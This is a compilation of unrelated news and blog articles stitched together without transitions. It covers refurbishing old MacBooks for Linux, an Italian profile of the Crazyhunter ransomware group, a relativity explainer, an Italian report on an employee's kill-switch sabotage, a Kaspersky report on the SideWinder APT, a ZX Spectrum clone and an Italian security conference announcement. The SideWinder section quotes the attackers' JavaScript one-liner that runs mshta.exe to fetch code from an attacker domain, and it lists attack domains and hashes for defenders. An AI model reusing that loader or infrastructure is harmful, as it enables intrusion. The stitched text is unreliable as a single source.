Despite a general lack of real-world experience, many teenagers are overly confident in their opinions, often to the point of brashness and arrogance. In the late 90s and early 00s I was no different, firmly entrenched in a clichéd belief that Apple computers weren’t worth the silicon they were etched onto—even though I’d never actually used one. Eventually, thanks to a very good friend in college, a bit of Linux knowledge, and Apple’s switch to Intel processors, I finally abandoned this one irrational belief. Now, I maintain an array of Apple laptops for my own personal use that are not only surprisingly repairable and hacker-friendly but also serve as excellent, inexpensive Linux machines.

Of course, I will have ruffled a few feathers suggesting Apple laptops are repairable and inexpensive. This is certainly not true of their phones or their newer computers, but there was a time before 2016 when Apple built some impressively high quality, robust laptops that use standard parts, have removable batteries, and, thanks to Apple dropping support for these older machines in their latest operating systems, can also be found for sale for next to nothing. In a way that’s similar to buying a luxury car that’s only a few years old and letting someone else eat the bulk of the depreciation, a high quality laptop from this era is only one Linux install away from being a usable and relatively powerful machine at an excellent bargain.

The History Lesson

To be fair to my teenage self though, Apple used to use less-mainstream PowerPC processors which meant there was very little software cross-compatibility with x86 PCs. It was also an era before broadband meant that most people could move their work into cloud and the browser, allowing them to be more agnostic about their operating system. Using an Apple when I was a teenager was therefore a much different experience than it is today. My first Apple was from this PowerPC era though; my ThinkPad T43 broke mid-way through college and a friend of mine gave me an old PowerBook G4 that had stopped working for her. Rather than have no computer at all, I swallowed my pride and was able to get the laptop working well enough to finish college with it. Part of the reason this repair was even possible was thanks to a major hacker-friendly aspect of Apple computers: they run Unix. (Note for commenters: technically Apple’s OS is Unix-like but they have carried a UNIX certification since 2007.)

I had used Unix somewhat in Solaris-based labs in college but, as I mentioned in a piece about installing Gentoo on one of my MacBooks, I was also getting pretty deep into the Linux world at the time as well. Linux was also designed to be Unix-like, so most of the basic commands and tools available for it have nearly one-to-one analogs in Unix. The PowerBook’s main problem, along with a battery that needed a warranty replacement, was a corrupted filesystem and disk drive that I was able to repair using my new Linux knowledge. This realization marked a major turning point for me which helped tear down most of my biases against Apple computers.
MacBooks through the ages
Over the next few years or so I grew quite fond of the PowerBook, partially because I liked its 12″, netbook-like form factor and also because the operating system never seemed to crash. As a Linux user, my system crashes were mostly self-inflicted, but they did happen. As a former Windows user as well, the fact that it wouldn’t randomly bluescreen itself through no fault of my own was quite a revelation. Apple was a few years into their Intel years at this point as well, and seeing how easily these computers did things my PowerBook could never do, including running Windows, I saved up enough money to buy my first MacBook Pro, a mid-2009 model which I still use to this day. Since then I’ve acquired four other Apple laptops, most of which run Linux or a patched version of macOS that lets older, unsupported machines run modern versions of Apple’s operating system.

So if you’ve slogged through my coming-of-age story and are still curious about picking up an old Mac for whatever reason—a friend or family member has one gathering dust, you’re tired of looking at the bland styling of older ThinkPads while simultaneously growing frustrated with the declining quality of their newer ones, or just want to go against the grain a bit and do something different—I’ll try and help by sharing some tips and guidelines I’ve picked up through the years.

What to Avoid

Starting with broad categories of older Apple laptops to avoid, the first major red flag are any with the butterfly keyboard that Apple put on various laptops from 2015 to 2019 which were so bad that a number of lawsuits were filed against them. Apple eventually relented and instituted a replacement program for them, but it’s since expired and can cost hundreds of dollars to fix otherwise. The second red flag are models with the T2 security chips. It’s not a complete dealbreaker but does add a lot of hassle if the end goal is a working Linux machine.

Additionally, pay close attention to any laptops with discrete graphics cards. Some older MacBooks have Nvidia graphics, which is almost always going to provide a below-average experience for a Linux user especially for Apple laptops of this vintage. Others have AMD graphics which do have better Linux support, but there were severe problems with the 15″ and 17″ Mac around the 2011 models. Discrete graphics is not something to avoid completely like laptops with butterfly keyboards, but it’s worth investigating the specific model year for problems if a graphics card is included. A final note is to be aware of “Staingate” which is a problem which impacted some Retina displays between 2012 and 2015. This of course is not an exhaustive list, but covers the major difficult-to-solve problems for this era of Apple laptop.

What to Look For

As for what specific computers are the best from this era for a bit of refurbishment and use, in my opinion the best mix of performance, hackability, and Linux-ability will be from the 2009-2012 Unibody era. These machines come in all sizes and are surprisingly upgradable, with standard SODIMM slots for RAM, 2.5″ laptop drives, an optical drive (which can be changed out for a second hard drive), easily replaceable batteries if you can unscrew the back cover, and plenty of ports. Some older models from this era have Core 2 Duo processors and should be avoided if you have the choice, but there are plenty of others from this era with much more powerful Core i5 or Core i7 processors.

After 2012, though, Apple started making some less-desirable changes for those looking to maintain their computers long-term, like switching to a proprietary M.2-like port for their storage and adding in soldered or otherwise non-upgradable RAM, but these machines can still be worthwhile as many had Core i7 processors and at least 8 GB of RAM and can still run Linux and even modern macOS versions quite capably. The batteries can still be replaced without too much hassle as well.
Inside the 2012 MacBook Pro. Visible here are the 2.5″ SSD, removable battery, standard SODIMM RAM slots, optical drive, and cooling fan.
Of course, a major problem with these computers is that they all have processors that have the Intel Management Engine coprocessor installed, so they’re not the most privacy-oriented machines in existence even if Linux is the chosen operating system. It’s worth noting, though, that some MacBooks from before the unibody era can run the open-source bootloader Libreboot but the tradeoff, as with any system capable of running Libreboot, is that they’re a bit limited in performance even compared to the computers from just a few years later.

Out of the five laptops I own, four are from the pre-butterfly era including my two favorites. Topping the list is a mid-2012 13″ MacBook Pro with Intel graphics that’s a beast of a Debian machine thanks to upgrades to a solid state drive and to 16 GB of RAM. It also has one of the best-feeling laptop keyboards I’ve ever used to write with, and is also the computer I used to experiment with Gentoo.

Second place goes to a 2015 11″ MacBook Air which is a netbook-style Apple that I like for its exceptional portability even though it’s not as upgradable as I might otherwise like. It will have 4 GB of RAM forever, but this is not much of a problem for Debian. I also still have my 2009 MacBook Pro as well, which runs macOS Sonoma thanks to OpenCore Legacy Patcher. This computer’s major weakness is that it has an Nvidia graphics card so it isn’t as good of a Linux machine as the others, and occasionally locks up when running Debian for this reason. But it also has been upgraded with an SSD and 8 GB of RAM so Sonoma still runs pretty well on it despite its age. Sequoia, on the other hand, dropped support for dual-core machines so I’m not sure what I will do with it after Sonoma is no longer supported.
A 13″ MacBook Air from 2013. Not quite as upgradable as the 2012 MacBook Pro but still has a removable battery and a heat sink which can be re-pasted much more easily.
My newest Apple laptop is an M1 MacBook Air, which I was excited about when it launched because I’m a huge fan of ARM-based personal computers for more reasons than one. Although the M1 does have essentially no user-repairability unless you want to go to extremes, I have some hope that this will last me as long as my MacBook Pros have thanks to a complete lack of moving parts and also because of Asahi Linux, a version of Fedora which is built for Apple silicon. Whenever Apple stops providing security patches for this machine, I plan to switch it over to this specialized Linux distribution.

Why Bother?

But why spend all this effort keeping these old machines running at all? If repairability is a major concern, laptops from companies like System76 or Framework are arguably a much better option. Not to mention that, at least according to the best Internet commenters out there, Apple computers aren’t supposed to be fixable, repairable, or upgradable at all. They’re supposed to slowly die as upgrades force them to be less useful.

While this is certainly true for their phones and their more modern machines to some extent, part of the reason I keep these older machines running is to go against the grain and do something different, like a classic car enthusiast who picks a 70s era Volkswagen to drive to and from the office every day instead of a modern Lexus. It’s also because at times I still feel a bit like that teenager I was. While I might be a little wiser now from some life experiences, I believe some amount of teenage rebellion can be put to use stubbornly refusing to buy the latest products year after year from a trillion-dollar company which has become synonymous with planned obsolescence. Take that, Apple!

hackaday.com/2025/03/10/inexpe…

Unsubstantiated claims that online safety rules restrict people's free speech have spread worldwide. Regulators are not prepared to respond.

digitalpolitics.co/newsletter0…

Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: Crazyhunter.

Con un’identità distinta e un manifesto che lo pone in contrasto con altri attori della scena cybercriminale, Crazyhunter si presenta come un’operazione sofisticata che punta sulla velocità di attacco, la distruzione dei dati e un sistema di branding criminale altamente strutturato.

Dalle informazioni raccolte sul loro Data Leak Site (DLS), disponibile nella rete Tor, il gruppo sembra adottare un approccio metodico e aggressivo, mirato a compromettere la sicurezza aziendale nel minor tempo possibile.

Con un sistema di negoziazione e gestione del riscatto che include strumenti di “dimostrazione” delle loro capacità distruttive, Crazyhunter si distingue per un modello di business che enfatizza la crittografia avanzata e persino l’uso della blockchain per registrare le loro “promesse” di decrittazione.

Struttura del DLS di Crazyhunter

Il portale Tor di Crazyhunter si articola in più sezioni, con un design minimale ma funzionale.

L’homepage Presenta il nome del gruppo e il motto: “There is no absolute safety”. Un’affermazione che riflette la loro filosofia, secondo cui nessun sistema è immune a un attacco ben strutturato.

Victim List

L’elenco delle vittime pubblicate mostra aziende ed enti, prevalentemente in Taiwan, tra cui ospedali e università. Ogni scheda riporta:

• Importo del riscatto richiesto (fino a $1.500.000).
• Stato della trattativa, con alcune voci contrassegnate come Expired (probabilmente significa che i dati verranno rilasciati) e altre con la dicitura Successful cooperation (indicando un pagamento effettuato).
• Timer per la scadenza dell’accordo, suggerendo un meccanismo di pressione psicologica sulle vittime.

About Us Qui il gruppo descrive il proprio modus operandi e i punti di forza del ransomware.

Contact Us Pagina con un form di contatto, utilizzata per le negoziazioni o possibili collaborazioni.

Tecniche e Tattiche di Attacco

Dalle informazioni fornite nel manifesto strategico, Crazyhunter si propone come un’operazione altamente tecnica, con una serie di caratteristiche distintive che lo rendono particolarmente pericoloso:

Approccio ultra-rapido: il “72-hour Vulnerability Response Vacuum”

Crazyhunter sostiene di bucare la sicurezza delle vittime in meno di 72 ore, grazie a:

• Exploit esclusivi, con un tempo di rilevamento superiore del 300% rispetto alle medie stimate dal MITRE.
• Bypass avanzato dei più noti sistemi di protezione degli endpoint, tra cui CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR, Trend Micro XDR.

Questo indica che il gruppo sfrutta vulnerabilità zero-day o N-day ben mirate, oltre a tattiche di evasion avanzate, che potrebbero includere l’uso di malware polimorfico e tecniche di attacco senza file (fileless attacks).

Il “Three-dimensional Data Annihilation System”

Crazyhunter non si limita a cifrare i dati, ma introduce un concetto di “annientamento” su tre livelli:

• Encryption Layer → Utilizza l’algoritmo XChaCha20-Poly1305, noto per la sua sicurezza e velocità, rendendo impossibile il recupero dei dati senza la chiave corretta.
• Destruction Layer → Impiega una tecnologia di cancellazione approvata dalla CIA, probabilmente riferendosi a standard come DoD 5220.22-M o metodi di sovrascrittura multipla per rendere i dati irrecuperabili.
• Deterrence Layer → Qui emerge un aspetto nuovo nel panorama ransomware: il gruppo afferma di generare prove compromettenti altamente realistiche contro i dirigenti delle aziende attaccate, mediante AI e deepfake, per esercitare una pressione aggiuntiva nelle negoziazioni.

Questo mix di crittografia avanzata, distruzione totale dei dati e minacce reputazionali rende Crazyhunter un attore unico nel suo genere, combinando ransomware tradizionale con metodi di coercizione psicologica.

Criminal Branding e Blockchain

Crazyhunter si distingue anche per un concetto inedito nel mondo del ransomware: il branding criminale. Tra i servizi offerti ci sono:

• Possibilità di ritardare la pubblicazione dei dati pagando il 50% del riscatto in anticipo.
• Una guida alla remediation delle vulnerabilità utilizzate per l’attacco, apparentemente come incentivo al pagamento.
• Un video di prova della cancellazione dei dati una volta pagato il riscatto.

Infine, il manifesto strategico sottolinea che il gruppo non si considera “avido” come REvil o “troppo rumoroso” come LockBit, e dichiara di fare solo tre cose:

1. Dimostrare l’inevitabilità dell’attacco attraverso la matematica.
2. Assicurare l’irreversibilità della minaccia tramite il codice.
3. Registrare ogni promessa mantenuta sulla blockchain.

L’ultimo punto suggerisce che Crazyhunter potrebbe utilizzare una blockchain pubblica o privata per tenere traccia delle operazioni completate, forse per dimostrare alle future vittime che mantengono la parola quando si tratta di fornire i decryptor dopo il pagamento.

Obiettivi e Vittime

L’analisi della victim list sul DLS di Crazyhunter mostra che il gruppo si è concentrato prevalentemente su organizzazioni taiwanesi, con un focus su:

• Università e istituti di ricerca (Asia University, Asia University Hospital).
• Strutture sanitarie (Mackay Hospital, Changhua Christian Medical Foundation).
• Aziende del settore energetico (Huacheng Electric).

L’inclusione di ospedali e istituzioni accademiche suggerisce un target opportunistico, dove la probabilità di pagamento è elevata a causa della sensibilità dei dati coinvolti. Tuttavia, è possibile che il gruppo espanda il proprio raggio d’azione verso aziende di altri settori nei prossimi mesi.

Conclusioni

Crazyhunter non è il solito gruppo ransomware. A differenza di altre operazioni che si concentrano solo sulla cifratura dei file, questo gruppo introduce tattiche di pressione aggiuntive, tra cui:

• Distruzione irreversibile dei dati, oltre alla cifratura.
• Uso di AI per creare prove compromettenti contro i dirigenti.
• Registrazione delle operazioni sulla blockchain per costruire “fiducia” nel mercato criminale.

Sebbene sia ancora presto per valutarne l’impatto complessivo, Crazyhunter ha già dimostrato di poter colpire organizzazioni di alto profilo e di avere un modello operativo altamente strategico. La combinazione di exploit avanzati, crittografia sofisticata e tattiche di coercizione lo rende una minaccia emergente da non sottovalutare.

Per le aziende, la lezione è chiara: non basta proteggersi dal ransomware tradizionale. Le nuove generazioni di cybercriminali stanno affinando strategie sempre più distruttive e difficili da contrastare.

L'articolo Crazyhunter: il nuovo ransomware con il “Sistema di Annientamento Dati Tridimensionale” proviene da il blog della sicurezza informatica.

Science fiction authors and readers dream of travelling at the speed of light, but Einstien tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphic argument for relativity that you can see in the video below.

The argument starts off by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing in the hidden height dimension at the exact same speed.

Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.

Now suppose the object turns a bit and is moving at, say, a 45 degree angle relative to the table top. Now the shadow moves and the “clock speed” measuring the height starts moving more slowly. If the object moves totally parallel to the surface, the shadow moves at the fixed speed and the clock speed shadow doesn’t move at all.

This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t necessarily a rule. It is simply that everything in the observable universe is moving at the speed of light and how moving through space affects it.

Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.

youtube.com/embed/TJmgKdc7H34?…

hackaday.com/2025/03/10/you-ar…

Negli Stati Uniti, la corte ha condannato uno sviluppatore di software Davis Lu, 55 anni, il quale è stato dichiarato colpevole di aver deliberatamente sabotato i sistemi informatici della sua ex azienda dopo essere stato declassato. L’incidente è avvenuto presso Eaton, una grande azienda impegnata nella gestione dell’energia e nella fornitura di soluzioni nei campi dell’ingegneria elettrica, idraulica e meccanica.

Lou lavorava nell’azienda dal 2007, ma le sue responsabilità e il suo stipendio sono stati notevolmente ridotti in seguito a una riorganizzazione aziendale nel 2018. In risposta, ha sviluppato un malware e ha installato un “kill switch” sui sistemi aziendali, che ha poi causato un grave guasto. Il codice dannoso includeva loop infiniti che sovraccaricavano le risorse del server di produzione, causando arresti anomali e impedendo agli utenti di effettuare l’accesso.

Inoltre, Lou ha eliminato i profili dei suoi colleghi e ha implementato un meccanismo di blocco che si attivava quando il suo account veniva disabilitato in Windows Active Directory. Questo software, chiamato tecnicamente “kill switch” è stato crittografato con il nome “IsDLEnabledinAD“, che sta per “Is Davis Lou Active in Active Directory“.

Al momento del suo licenziamento, il 9 settembre 2019, il codice ha automaticamente bloccato l’accesso ai sistemi per migliaia di dipendenti.

Il giorno in cui gli fu ordinato di restituire il portatile aziendale, Lou cancellò i dati crittografati. Secondo il Dipartimento di Giustizia degli Stati Uniti, le ricerche di Lu su Internet indicavano tentativi di trovare modi per aumentare i privilegi, nascondere processi ed eliminare rapidamente file.

Le azioni di Lou costarono all’azienda centinaia di migliaia di dollari di danni. Il tribunale lo ha ritenuto colpevole di aver intenzionalmente danneggiato computer protetti, reato che prevede una pena massima di 10 anni di carcere. Non è ancora stata fissata la data della sentenza.

L'articolo Vendetta Digitale! Un Dipendente Infedele Sabota l’azienda con un Kill Switch dopo il licenziamento proviene da il blog della sicurezza informatica.

Casualmente avevo programmato la ripubblicazione di questo contributo nel momento in cui l’attualità ci consegna la notizia che negli Stati Uniti vengono messe al bando delle parole, una delle quali è gender. In questa relazione, come poi nel libro che pubblicammo, è una parola che ricorre di frequente: Prima di essere spacciata come una specie di mostro, nemico delle famiglie e dei valori, gender era una parola relativamente nota per via dell’espressione gender studies, di cui per una serie di ragioni non si usava molto il corrispettivo italiano.
Ancora più volentieri, dunque, ripubblico questo contributo quasi giovanile, in un clima in cui si manomette il senso delle parole per liberarsi di decenni di elaborazione del pensiero.

massimogiuliani.it/blog/2025/0…

Per una terapia sistemica “sensibile al genere”

A proposito di una ricerca che ho condotto anni fa con Adriana Valle sulle questioni di genere in terapia della famiglia e sulla prescrittività dei ruoli maschile e femminile.

^{Corpi che parlano, il blog}

Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.

In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.

Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.

Infection vectors

The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate.

Some documents concerned nuclear power plants and nuclear energy agencies.

Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructures and various port authorities.

Malicious documents relating to maritime infrastructures and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.

We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Examples of generic malicious documents

RTF exploit

The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the
mshtml.RunHTMLApplication function.
In the new version, the embedded JavaScript runs the Windows utility
mshta.exe and obtains additional code from a remote server:javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.

• It uses the GlobalMemoryStatusEx function to determine the size of RAM.
• It attempts to load the nlssorting.dll library and terminates execution if operation succeeds.

JavaScript loader

The RTF exploit led to the execution of the
mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker.mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui
The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.

The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

The second stage is another JavaScript file. It enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable
COMPLUS_Version.
Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Downloader Module

This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the
app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions.
In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.

Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader

The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:
propsys.dll
vsstrace.dll
During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:
JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll
The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.

Victims

SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.

Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.

In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion

SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.

Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.

We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents

e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c

Backdoor Loader

0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe

Domains and IPs

pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
directt88[.]com
file-dwnld[.]org
defencearmy[.]pro
document-viewer[.]info
aliyum[.]email
d0cumentview[.]info
debcon[.]live
document-viewer[.]live
documentviewer[.]info
ms-office[.]app
ms-office[.]pro
pncert[.]info
session-out[.]com
zeltech[.]live
ziptec[.]info
depo-govpk[.]com
crontec[.]site
mteron[.]info
mevron[.]tech
veorey[.]live
mod-kh[.]info

securelist.com/sidewinder-apt-…

If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s less than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.

The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.

While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.

hackaday.com/2025/03/10/zx-spe…

Mancano solo due mesi alla quarta edizione della Red Hot Cyber Conference 2025, l’evento annuale gratuito organizzato dalla community di Red Hot Cyber. La conferenza si terrà a Roma, come lo scorso anno presso il Teatro Italia in Via Bari 18, nelle giornate di giovedì 8 e venerdì 9 maggio 2025.

Questo appuntamento è diventato un punto di riferimento nel panorama italiano della sicurezza informatica, dell’intelligenza artificiale e dell’innovazione tecnologica, con l’obiettivo di sensibilizzare il pubblico sui rischi del digitale e promuovere la cultura della cybersecurity, soprattutto tra i più giovani.

La community di Red Hot Cyber, fondata nel 2019 da Massimiliano Brolli, si dedica alla diffusione di informazioni, notizie e ricerche su temi legati alla sicurezza informatica, all’intelligence e all’Information Technology. Con la convinzione che la condivisione della conoscenza e la collaborazione siano fondamentali per affrontare le sfide del cyberspazio, RHC si impegna attivamente nella promozione di una cultura della sicurezza, incoraggiando il pensiero critico e stimolando l’interesse per le discipline informatiche tra i giovani.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Accoglienza alla Red Hot Cyber Conference 2024

Una Prima Giornata Dedicata Esclusivamente Ai Giovani

Come ogni anno, la prima giornata della conferenza sarà interamente dedicata ai giovani, in particolare agli studenti delle scuole medie e superiori, per avvicinarli al mondo dell’information technology e della sicurezza informatica. A differenza degli scorsi anni, i Workshop saranno accessibili solo alla giornata di Giovedì 8 maggio.

I workshop hands-on – anche questo anno organizzati con il supporto di Accenture – saranno il cuore pulsante della giornata: prima spiegheremo ai ragazzi come si fa qualcosa, poi gli daremo la possibilità di rifarlo direttamente loro stessi sui loro laptop. Questo approccio pratico e interattivo è pensato per stimolare l’interesse verso il mondo della tecnologia e della cybersecurity e fornire un’opportunità unica di toccare con mano la tecnologia.
Il Cane SPOT della Boston Dynamics all’interno dei Workshop “hands-on” della Red Hot Cyber Conference 2024
Invitiamo i ragazzi delle scuole medie, superiori ed Università a registrarsi alla conferenza, affinché possano vivere un’esperienza formativa concreta e immersiva.

Ma la prima giornata non sarà solo formazione: anche quest’anno si terrà la Capture The Flag (CTF), una competizione per hacker etici provenienti da tutta Italia. I partecipanti si sfideranno in una serie di prove pratiche di cybersecurity, hacking etico e problem-solving, accumulando punteggi per scalare la classifica e vincere la challenge.

Una CTF è una competizione di cybersecurity in cui i partecipanti devono risolvere sfide di sicurezza informatica per trovare e “catturare” delle flag, ovvero dei codici nascosti all’interno di vari scenari digitali. La CTF di RHC si svolgerà in un ambiente sicuro e controllato, offrendo a giovani hacker l’opportunità di mettere alla prova le proprie capacità, imparare nuove tecniche e confrontarsi con altri appassionati del settore.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Capture The Flag (CTF) della Red Hot Cyber Conference 2024

Una Seconda Giornata All’Insegna Della Conferenza

Se la prima giornata sarà focalizzata sui giovani e sulla formazione pratica, la seconda giornata della Red Hot Cyber Conference 2025 sarà dedicata esclusivamente alla conferenza, con una serie di speech di alto livello interamente in lingua italiana.

Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
